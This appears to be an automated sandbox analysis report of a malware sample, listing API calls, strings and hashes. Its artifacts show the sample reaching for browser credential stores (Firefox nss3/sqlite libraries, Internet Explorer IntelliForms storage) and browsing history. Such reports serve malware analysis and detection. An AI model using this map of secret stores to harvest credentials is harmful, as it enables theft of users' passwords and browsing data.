                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • LoadLibraryW.KERNEL32(comctl32.dll,00000000,?,00000002,?,?,?,0040E305,00000000), ref: 00403945
                                                              • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00403957
                                                              • FreeLibrary.KERNEL32(00000000,?,00000002,?,?,?,0040E305,00000000), ref: 0040396B
                                                              • #17.COMCTL32(?,00000002,?,?,?,0040E305,00000000), ref: 00403979
                                                              • MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00403996
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.275551658.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.275776933.0000000000452000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Library$AddressFreeLoadMessageProc
                                                              • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                                              • API String ID: 2780580303-317687271
                                                              • Opcode ID: 60c968a06818d841dc3f94f16557b2d6df9d0dbd22d8837fd1ebe6fbdb2c419c
                                                              • Instruction ID: dc7e95600dee0bf6daca19896d95929b9e7fb1f9fe7c184dfd563e32ea829a14
                                                              • Opcode Fuzzy Hash: 60c968a06818d841dc3f94f16557b2d6df9d0dbd22d8837fd1ebe6fbdb2c419c
                                                              • Instruction Fuzzy Hash: 8501D1B67502117BE3111FB49C89B6B7EACDB42F4BB100139B502F2280DBB8CF05869C
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • GetModuleHandleW.KERNEL32(nss3.dll,00000000,?,?,74B057F0,0040FC10,?,?,?,?,?,00000000), ref: 0040FAC9
                                                              • GetModuleHandleW.KERNEL32(sqlite3.dll,?,74B057F0,0040FC10,?,?,?,?,?,00000000), ref: 0040FAD2
                                                              • GetModuleHandleW.KERNEL32(mozsqlite3.dll,?,74B057F0,0040FC10,?,?,?,?,?,00000000), ref: 0040FADB
                                                              • FreeLibrary.KERNEL32(00000000,?,74B057F0,0040FC10,?,?,?,?,?,00000000), ref: 0040FAEA
                                                              • FreeLibrary.KERNEL32(00000000,?,74B057F0,0040FC10,?,?,?,?,?,00000000), ref: 0040FAF1
                                                              • FreeLibrary.KERNEL32(00000000,?,74B057F0,0040FC10,?,?,?,?,?,00000000), ref: 0040FAF8
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.275551658.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.275776933.0000000000452000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: FreeHandleLibraryModule
                                                              • String ID: mozsqlite3.dll$nss3.dll$sqlite3.dll
                                                              • API String ID: 662261464-3550686275
                                                              • Opcode ID: d0d754f8fa980613d90b85c052ffa4ec5d0d6696dd4c8834489f6bf69c2357b0
                                                              • Instruction ID: c5d69885cf2e3d5474ff6b38c23ba8038bf1212ac087c8b68f6824d90ef94812
                                                              • Opcode Fuzzy Hash: d0d754f8fa980613d90b85c052ffa4ec5d0d6696dd4c8834489f6bf69c2357b0
                                                              • Instruction Fuzzy Hash: 1AE0D816B0132E669E2067F16C44D1B7E5CC892AE53150037A904A32408DEC5C0599F8
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.275551658.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.275776933.0000000000452000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: memcpy$memchrmemset
                                                              • String ID: G"D$G"D
                                                              • API String ID: 1581201632-2001841848
                                                              • Opcode ID: 7575a319fd1e5a0cf748581ae524368e3baf011f309bc42e4df5649906151b93
                                                              • Instruction ID: 18be241936230d761fb3e4c1ab226db0ef0f42d77396bda2a3194a4a2a5a8e65
                                                              • Opcode Fuzzy Hash: 7575a319fd1e5a0cf748581ae524368e3baf011f309bc42e4df5649906151b93
                                                              • Instruction Fuzzy Hash: CE51E671900219ABDB10EF65CD85EEEB7BCAF44304F44446BFA49D7141E778EA48CB64
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • GetSystemMetrics.USER32 ref: 004078A9
                                                              • GetSystemMetrics.USER32 ref: 004078AF
                                                              • GetDC.USER32(00000000), ref: 004078BC
                                                              • GetDeviceCaps.GDI32(00000000,00000008), ref: 004078CD
                                                              • GetDeviceCaps.GDI32(00000000,0000000A), ref: 004078D4
                                                              • ReleaseDC.USER32 ref: 004078DB
                                                              • GetWindowRect.USER32 ref: 004078EE
                                                              • GetParent.USER32(?), ref: 004078F3
                                                              • GetWindowRect.USER32 ref: 00407910
                                                              • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 0040796F
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.275551658.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.275776933.0000000000452000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Window$CapsDeviceMetricsRectSystem$MoveParentRelease
                                                              • String ID:
                                                              • API String ID: 2163313125-0
                                                              • Opcode ID: 27c47932f92ae397c529d5322f361d1abbe154fe8b4fd6afae4dd3e0e48430fe
                                                              • Instruction ID: 40da1e460122d0dbc2375826a99d02d2520f98ce936ed6642694246a0da552c1
                                                              • Opcode Fuzzy Hash: 27c47932f92ae397c529d5322f361d1abbe154fe8b4fd6afae4dd3e0e48430fe
                                                              • Instruction Fuzzy Hash: D3318176A00209AFDB04DFB8CC85AEEBBB9FB48351F150175E901F3290DA70AE418B50
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • memset.MSVCRT ref: 00406878
                                                              • memset.MSVCRT ref: 0040688C
                                                              • strcpy.MSVCRT(?), ref: 004068A6
                                                              • strcpy.MSVCRT(?,?,?,?,?,?), ref: 004068EB
                                                              • strcpy.MSVCRT(?,00001000,?,?,?,?,?,?), ref: 004068FF
                                                              • strcpy.MSVCRT(?,?,?,00001000,?,?,?,?,?,?), ref: 00406912
                                                              • wcscpy.MSVCRT ref: 00406921
                                                              • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,?,?,?,?,?,?,?,?,Rp@,00406D64), ref: 00406948
                                                              • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,?,?,?,?,?,?,?,?,Rp@,00406D64), ref: 0040695E
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.275551658.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.275776933.0000000000452000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: strcpy$ByteCharMultiWidememset$wcscpy
                                                              • String ID: Rp@
                                                              • API String ID: 4248099071-3382320042
                                                              • Opcode ID: 671e59c8fe4c17755a702227dbfb0f671c225521712c780855f09c1fc1980107
                                                              • Instruction ID: 073529020724e05d4964247b7c64433db30515fb9166064be710f6d7ccb76f44
                                                              • Opcode Fuzzy Hash: 671e59c8fe4c17755a702227dbfb0f671c225521712c780855f09c1fc1980107
                                                              • Instruction Fuzzy Hash: 653141B290011DBFDB20DA55CC84FEA77BCFF09358F0445AAB919E3141DA74AA588F68
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.275551658.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.275776933.0000000000452000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: free$wcslen
                                                              • String ID:
                                                              • API String ID: 3592753638-3916222277
                                                              • Opcode ID: 48dd093f60871879cfe8b2d7a7b4ba9b775405f798140245073d8282a08525a6
                                                              • Instruction ID: 27dbad6a18cb5119fe9557e6abee58e32c1211c22f38b2cca10356837960f856
                                                              • Opcode Fuzzy Hash: 48dd093f60871879cfe8b2d7a7b4ba9b775405f798140245073d8282a08525a6
                                                              • Instruction Fuzzy Hash: DA615770C0811AEBEF189F95E6895AEB771FF04305F60847FE442B62E0DBB84981CB59
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                                • Part of subcall function 004059F7: _wcsicmp.MSVCRT ref: 00405A28
                                                              • memset.MSVCRT ref: 00408CAF
                                                                • Part of subcall function 00405CF6: memset.MSVCRT ref: 00405DF2
                                                              • free.MSVCRT(000000FF,?,000000FF,00000000,00000104,74B5F560), ref: 00408D7D
                                                                • Part of subcall function 00408801: _wcsicmp.MSVCRT ref: 0040881A
                                                                • Part of subcall function 00408116: wcslen.MSVCRT ref: 00408125
                                                                • Part of subcall function 00408116: _memicmp.MSVCRT ref: 00408153
                                                              • _snwprintf.MSVCRT ref: 00408D49
                                                                • Part of subcall function 00407EDE: wcslen.MSVCRT ref: 00407EF0
                                                                • Part of subcall function 00407EDE: free.MSVCRT(?,00000001,?,00000000,?,?,0040833F,?,000000FF), ref: 00407F16
                                                                • Part of subcall function 00407EDE: free.MSVCRT(?,00000001,?,00000000,?,?,0040833F,?,000000FF), ref: 00407F39
                                                                • Part of subcall function 00407EDE: memcpy.MSVCRT ref: 00407F5D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.275551658.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.275776933.0000000000452000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: free$_wcsicmpmemsetwcslen$_memicmp_snwprintfmemcpy
                                                              • String ID: $ContainerId$Container_%I64d$Containers$Name
                                                              • API String ID: 2804212203-2982631422
                                                              • Opcode ID: 382120a6960bfed999be5f81f16b3b0c66134d3af4f49bf47bdd7130a4487680
                                                              • Instruction ID: ce292a4a65043f2a6a20625204029b960355a9169e5f8c073e361fa6e4a76ec5
                                                              • Opcode Fuzzy Hash: 382120a6960bfed999be5f81f16b3b0c66134d3af4f49bf47bdd7130a4487680
                                                              • Instruction Fuzzy Hash: 1E313E72D00219AADF50EFA5DD85ADEB7B8AF04354F50017FA508B21C1DE78AE458F68
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • LoadMenuW.USER32 ref: 0040A83F
                                                                • Part of subcall function 0040A668: GetMenuItemCount.USER32 ref: 0040A67E
                                                                • Part of subcall function 0040A668: memset.MSVCRT ref: 0040A69D
                                                                • Part of subcall function 0040A668: GetMenuItemInfoW.USER32 ref: 0040A6D9
                                                                • Part of subcall function 0040A668: wcschr.MSVCRT ref: 0040A6F1
                                                              • DestroyMenu.USER32(00000000), ref: 0040A85D
                                                              • CreateDialogParamW.USER32 ref: 0040A8AB
                                                              • memset.MSVCRT ref: 0040A8C7
                                                              • GetWindowTextW.USER32 ref: 0040A8DC
                                                              • EnumChildWindows.USER32 ref: 0040A907
                                                              • DestroyWindow.USER32(00000000), ref: 0040A90E
                                                                • Part of subcall function 0040A497: _snwprintf.MSVCRT ref: 0040A4BC
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.275551658.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.275776933.0000000000452000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Menu$DestroyItemWindowmemset$ChildCountCreateDialogEnumInfoLoadParamTextWindows_snwprintfwcschr
                                                              • String ID: caption
                                                              • API String ID: 1928666178-4135340389
                                                              • Opcode ID: 2a735e7d3e9f25f5000f535f47a02417f98db50f76fb95be89fb06d3c5800170
                                                              • Instruction ID: 1ee1ed61ad6e464c94b1b5c04ceaba47984998c4c5bccbb9cf540d7a9e91c68f
                                                              • Opcode Fuzzy Hash: 2a735e7d3e9f25f5000f535f47a02417f98db50f76fb95be89fb06d3c5800170
                                                              • Instruction Fuzzy Hash: 4C21B472100314BBDB11AF50DC49BAF3B78FF45751F148436F905A5191D7788AA0CB6A
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.275551658.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.275776933.0000000000452000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: memcpywcslen$_snwprintfmemset
                                                              • String ID: %s (%s)$G@
                                                              • API String ID: 3979103747-4021399728
                                                              • Opcode ID: f04d55ffe867956f13ff29a0b22ee26a635b57cfc1c306c95c53cfde12d0b5a1
                                                              • Instruction ID: 7020ae682d4dad294ec7254b180182bae2c538f47323e789ebcab58d633c0506
                                                              • Opcode Fuzzy Hash: f04d55ffe867956f13ff29a0b22ee26a635b57cfc1c306c95c53cfde12d0b5a1
                                                              • Instruction Fuzzy Hash: 58215E72900219BBDF21DF95CD4599BB7B8BF04358F40846AF948AB201EB74EA188BD4
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • LoadLibraryExW.KERNEL32(netmsg.dll,00000000,00000002,?,00000000,?,?,004071E5,?,00000000,?,0040C6FE,00000000), ref: 004070E4
                                                              • FormatMessageW.KERNEL32(00001100,00000000,?,00000400,00000000,00000000,00000000,?,00000000,?,?,004071E5,?,00000000,?,0040C6FE), ref: 00407102
                                                              • wcslen.MSVCRT ref: 0040710F
                                                              • wcscpy.MSVCRT ref: 0040711F
                                                              • LocalFree.KERNEL32(00000000,?,00000400,00000000,00000000,00000000,?,00000000,?,?,004071E5,?,00000000,?,0040C6FE,00000000), ref: 00407129
                                                              • wcscpy.MSVCRT ref: 00407139
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.275551658.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.275776933.0000000000452000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: wcscpy$FormatFreeLibraryLoadLocalMessagewcslen
                                                              • String ID: Unknown Error$netmsg.dll
                                                              • API String ID: 2767993716-572158859
                                                              • Opcode ID: 26114b79388437db0e90dde86d0aa8455aeff93cef19d95b112ae8d9efa36594
                                                              • Instruction ID: 89f566b746906e4e3228774242dd749435861e54522ca67c51f24cfbd45377e0
                                                              • Opcode Fuzzy Hash: 26114b79388437db0e90dde86d0aa8455aeff93cef19d95b112ae8d9efa36594
                                                              • Instruction Fuzzy Hash: 2301F231A08114BBEB145B61EC46E9FBB68EB05BA1F20007AF606F41D0DEB96F00969C
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                                • Part of subcall function 00407548: GetFileAttributesW.KERNEL32(?,0040A987,?,0040AA3E,00000000,?,00000000,00000208,?), ref: 0040754C
                                                              • wcscpy.MSVCRT ref: 0040A998
                                                              • wcscpy.MSVCRT ref: 0040A9A8
                                                              • GetPrivateProfileIntW.KERNEL32 ref: 0040A9B9
                                                                • Part of subcall function 0040A51E: GetPrivateProfileStringW.KERNEL32 ref: 0040A53A
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.275551658.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.275776933.0000000000452000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: PrivateProfilewcscpy$AttributesFileString
                                                              • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                                                              • API String ID: 3176057301-2039793938
                                                              • Opcode ID: 1673debe331e7a8ca134e50d5334904a3cc19ce9f9385a73b99b164dd8d493e6
                                                              • Instruction ID: f715108fd1d236bc9ad6a323193eaeb919362f53399fbb1b2bc2ef5a739791b1
                                                              • Opcode Fuzzy Hash: 1673debe331e7a8ca134e50d5334904a3cc19ce9f9385a73b99b164dd8d493e6
                                                              • Instruction Fuzzy Hash: 33F0CD22EC035536E61176221D07F3E25088BA1B66F95447FBD08BA2D3DE7C4A14869E
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Strings
                                                              • database is already attached, xrefs: 0042CEA8
                                                              • too many attached databases - max %d, xrefs: 0042CDD7
                                                              • database %s is already in use, xrefs: 0042CE4F
                                                              • unable to open database: %s, xrefs: 0042CFD5
                                                              • attached databases must use the same text encoding as main database, xrefs: 0042CEF6
                                                              • cannot ATTACH database within transaction, xrefs: 0042CDED
                                                              • out of memory, xrefs: 0042CFEC
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.275551658.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.275776933.0000000000452000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: memcpymemset
                                                              • String ID: attached databases must use the same text encoding as main database$cannot ATTACH database within transaction$database %s is already in use$database is already attached$out of memory$too many attached databases - max %d$unable to open database: %s
                                                              • API String ID: 1297977491-2001300268
                                                              • Opcode ID: 9031da780ff69da590ffb3ad1101421015f0ee0ff19cf333b8a9ef6fce115eea
                                                              • Instruction ID: 266062839a895961ad217d8ef2c4278de09ba8d71166d49c3bc68db0563119ae
                                                              • Opcode Fuzzy Hash: 9031da780ff69da590ffb3ad1101421015f0ee0ff19cf333b8a9ef6fce115eea
                                                              • Instruction Fuzzy Hash: BE91C171B00315AFDB20DF69D981B9EBBF1AF04308F64845FE8159B282D778EA41CB59
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                                • Part of subcall function 0040ADBB: ??3@YAXPAX@Z.MSVCRT ref: 0040ADC7
                                                                • Part of subcall function 0040ADBB: ??3@YAXPAX@Z.MSVCRT ref: 0040ADD5
                                                                • Part of subcall function 0040ADBB: ??3@YAXPAX@Z.MSVCRT ref: 0040ADE6
                                                                • Part of subcall function 0040ADBB: ??3@YAXPAX@Z.MSVCRT ref: 0040ADFD
                                                                • Part of subcall function 0040ADBB: ??3@YAXPAX@Z.MSVCRT ref: 0040AE06
                                                              • ??2@YAPAXI@Z.MSVCRT ref: 0040B01A
                                                              • ??2@YAPAXI@Z.MSVCRT ref: 0040B036
                                                              • memcpy.MSVCRT ref: 0040B05B
                                                              • memcpy.MSVCRT ref: 0040B06F
                                                              • ??2@YAPAXI@Z.MSVCRT ref: 0040B0F2
                                                              • ??2@YAPAXI@Z.MSVCRT ref: 0040B0FC
                                                              • ??2@YAPAXI@Z.MSVCRT ref: 0040B134
                                                                • Part of subcall function 00409FF5: GetModuleHandleW.KERNEL32(00000000,?,?,0040B09A,?,0040E241,00000000,00000000,?), ref: 0040A034
                                                                • Part of subcall function 00409FF5: LoadStringW.USER32(00000000,00000007,?,?), ref: 0040A0CD
                                                                • Part of subcall function 00409FF5: memcpy.MSVCRT ref: 0040A10D
                                                                • Part of subcall function 00409FF5: wcscpy.MSVCRT ref: 0040A076
                                                                • Part of subcall function 00409FF5: wcslen.MSVCRT ref: 0040A094
                                                                • Part of subcall function 00409FF5: GetModuleHandleW.KERNEL32(00000000,?,?,?,0040B09A,?,0040E241,00000000,00000000,?), ref: 0040A0A2
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.275551658.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.275776933.0000000000452000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ??2@??3@$memcpy$HandleModule$LoadStringwcscpywcslen
                                                              • String ID: ($d
                                                              • API String ID: 1140211610-1915259565
                                                              • Opcode ID: 61fa9ce97632ee492bcc3551807e601a0a2fe9be5018ff7d35ad06aa6fb27383
                                                              • Instruction ID: 8a5fa3be38e8e11f26e8e9502e5dff09d3bfeaf4ce2a81799fe883ad29a31388
                                                              • Opcode Fuzzy Hash: 61fa9ce97632ee492bcc3551807e601a0a2fe9be5018ff7d35ad06aa6fb27383
                                                              • Instruction Fuzzy Hash: 50517872601700AFE728DF2AC586A5AB7E4FF48358F10852EE55ACB791DB74E940CB48
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • LockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 0041510E
                                                              • Sleep.KERNEL32(00000001), ref: 00415118
                                                              • GetLastError.KERNEL32 ref: 0041512A
                                                              • UnlockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 00415202
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.275551658.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.275776933.0000000000452000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: File$ErrorLastLockSleepUnlock
                                                              • String ID:
                                                              • API String ID: 3015003838-0
                                                              • Opcode ID: 9f8ed0d04d3051dd5d2585b6ab40f83052c279f07ad27e494029b12bda0602be
                                                              • Instruction ID: 880e68434f8ef122057b7821066ce039c6a6aeb50982fb6198a036ab3cbbf4dd
                                                              • Opcode Fuzzy Hash: 9f8ed0d04d3051dd5d2585b6ab40f83052c279f07ad27e494029b12bda0602be
                                                              • Instruction Fuzzy Hash: 7641F379504B42EFE3228F219C05BEBB7E0EFC0B15F20492FF59556240CBB9D9858E1A
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • DeleteFileW.KERNEL32(00000000,?,00000000,00000080,0045162C,00415469,00000000,?,00000000,00000000), ref: 00415D77
                                                              • GetFileAttributesW.KERNEL32(00000000), ref: 00415D7E
                                                              • GetLastError.KERNEL32 ref: 00415D8B
                                                              • Sleep.KERNEL32(00000064), ref: 00415DA0
                                                              • DeleteFileA.KERNEL32(00000000,?,00000000,00000080,0045162C,00415469,00000000,?,00000000,00000000), ref: 00415DA9
                                                              • GetFileAttributesA.KERNEL32(00000000), ref: 00415DB0
                                                              • GetLastError.KERNEL32 ref: 00415DBD
                                                              • Sleep.KERNEL32(00000064), ref: 00415DD2
                                                              • free.MSVCRT(00000000), ref: 00415DDB
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.275551658.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.275776933.0000000000452000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: File$AttributesDeleteErrorLastSleep$free
                                                              • String ID:
                                                              • API String ID: 2802642348-0
                                                              • Opcode ID: 59553552cb9c7a634a86bba8fee94823d60f8ff18cb46191598ed330d0414666
                                                              • Instruction ID: 389b81331b8195f66de6fade72418799adbb9e1ccdce19076b3e4dce97b88e29
                                                              • Opcode Fuzzy Hash: 59553552cb9c7a634a86bba8fee94823d60f8ff18cb46191598ed330d0414666
                                                              • Instruction Fuzzy Hash: 13118A39500E10DBC6203B747C8D6FF36249BD7B37B21832BF963952D1DA5948C2566A
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.275551658.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.275776933.0000000000452000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: memcpy
                                                              • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                                              • API String ID: 3510742995-3273207271
                                                              • Opcode ID: 449b515319a675a2a0fe7de20888cf946b50a79f9f1d785cd6ce0af7e4c5c8d6
                                                              • Instruction ID: 1d27d4cf7977f40543be0eb13b72094ec5c0409efe485552fd301264f6eb4def
                                                              • Opcode Fuzzy Hash: 449b515319a675a2a0fe7de20888cf946b50a79f9f1d785cd6ce0af7e4c5c8d6
                                                              • Instruction Fuzzy Hash: 570145B6E54260F2FA3024058EE6FF30145CB62754FA40027F88AA02C0A1CD0EE3A29F
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                                • Part of subcall function 00407EB8: free.MSVCRT(?,00408225,00000000,?,00000000), ref: 00407EBB
                                                                • Part of subcall function 00407EB8: free.MSVCRT(?,?,00408225,00000000,?,00000000), ref: 00407EC3
                                                                • Part of subcall function 00411B67: RegOpenKeyExW.ADVAPI32(80000002,80000002,00000000,00020019,80000002,00412303,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,?), ref: 00411B7A
                                                                • Part of subcall function 00408001: free.MSVCRT(?,00000000,?,004082EE,00000000,?,00000000), ref: 00408010
                                                              • memset.MSVCRT ref: 004096C7
                                                              • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,80000001,?,?,?,?,00000000,?), ref: 004096F5
                                                              • _wcsupr.MSVCRT ref: 0040970F
                                                                • Part of subcall function 00407EDE: wcslen.MSVCRT ref: 00407EF0
                                                                • Part of subcall function 00407EDE: free.MSVCRT(?,00000001,?,00000000,?,?,0040833F,?,000000FF), ref: 00407F16
                                                                • Part of subcall function 00407EDE: free.MSVCRT(?,00000001,?,00000000,?,?,0040833F,?,000000FF), ref: 00407F39
                                                                • Part of subcall function 00407EDE: memcpy.MSVCRT ref: 00407F5D
                                                              • memset.MSVCRT ref: 0040975E
                                                              • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,80000001,80000001,?,000000FF,?,?,?,?,00000000), ref: 00409789
                                                              • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000,?), ref: 00409796
                                                              Strings
                                                              • Software\Microsoft\Internet Explorer\IntelliForms\Storage2, xrefs: 00409674
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.275551658.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.275776933.0000000000452000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: free$EnumValuememset$CloseOpen_wcsuprmemcpywcslen
                                                              • String ID: Software\Microsoft\Internet Explorer\IntelliForms\Storage2
                                                              • API String ID: 4131475296-680441574
                                                              • Opcode ID: 6b632c4dfc662ca072cba24578c65978ce91ae5ddd9b4ea36e8450e941971d95
                                                              • Instruction ID: ced938f56f23152dc4036b8c9c372f29a7907612beabbfd18841790b2154e098
                                                              • Opcode Fuzzy Hash: 6b632c4dfc662ca072cba24578c65978ce91ae5ddd9b4ea36e8450e941971d95
                                                              • Instruction Fuzzy Hash: F84118B6D4011DABCB10EF99DD85AEFB7BCAF18304F1040AAB504F2191D7749B458BA4
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                                • Part of subcall function 00407EB8: free.MSVCRT(?,00408225,00000000,?,00000000), ref: 00407EBB
                                                                • Part of subcall function 00407EB8: free.MSVCRT(?,?,00408225,00000000,?,00000000), ref: 00407EC3
                                                                • Part of subcall function 00408037: free.MSVCRT(00000000,00408352,00000000,?,00000000), ref: 0040803E
                                                                • Part of subcall function 00409508: memset.MSVCRT ref: 0040952C
                                                                • Part of subcall function 00409508: FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 004095A1
                                                                • Part of subcall function 00409508: wcschr.MSVCRT ref: 004095B8
                                                                • Part of subcall function 00409508: wcschr.MSVCRT ref: 004095D8
                                                                • Part of subcall function 00409508: FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 004095FD
                                                                • Part of subcall function 00409508: GetLastError.KERNEL32 ref: 00409607
                                                                • Part of subcall function 00409657: memset.MSVCRT ref: 004096C7
